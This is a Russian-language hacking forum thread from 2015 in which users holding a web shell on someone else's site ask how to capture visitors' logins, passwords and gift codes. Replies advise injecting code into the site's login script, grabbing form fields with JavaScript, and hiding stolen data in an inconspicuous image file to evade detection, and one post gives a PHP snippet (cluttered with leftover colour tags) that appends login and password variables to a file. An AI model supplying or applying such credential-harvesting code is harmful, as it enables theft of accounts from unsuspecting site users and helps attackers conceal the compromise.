ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   установка сниффера (https://forum.antichat.xyz/showthread.php?t=423635)

reuvenmatbil 27.03.2015 13:19

имею шелл на сайте.

необходимо перехватывать логин и пароли юзеров чтоб они шли на впс

в какую сторону начинать копать чтобы реализовать задумку?

KIR@PRO 09.04.2015 01:17

инжект в скрипт авторизации, если есть соответствующие права на файл...

qweqwe 10.05.2015 05:12

так же интересует данный вопрос. Может кто то пример показать. Имеется шелл, идет ввод гифт кода, напишите примерный код, для того, чтобы введеные данные уходили ко мне на ВПС.

Так же прошу помощи по php, какие функции поизучать, чтобы ствить подобого рода снифера?

(чтобы ореентироватся в коде, какие параметры смотреть, как смотреть, что передается какой командой и тд. ) Спс заранее за помощь и ответы

blaga 10.05.2015 15:04

можно использовать два метода. первый - это просто грабим данные из форм посредством javaScript и ajax

второй - грабим переменные из php и их уже коипруем\отправляем на сервак.

кстати я бы не стал слать данные на свой серв, т.к. при обнаружении сниффера ваш серв спалят сразу же.

лучше данные писать в неприметный файл, например картинку и потом с сервера по крону скачивать эту картинку.

Black Diver 10.05.2015 19:04

Например можно писать все переменные логина в файл и расположить его в удобном неприметном месте для скачивания.

Для этого в скрипт авторизации (после получения переменных с логином/паролем) вставляем код в стиле (код писался на коленке):

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'counter.txt'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login_var[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pass_var[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR

где counter.txt это имя файла, $login_var и $pass_var - переменные из оригинального скрипта с логином и паролем а \n - перевод строки


Время: 03:40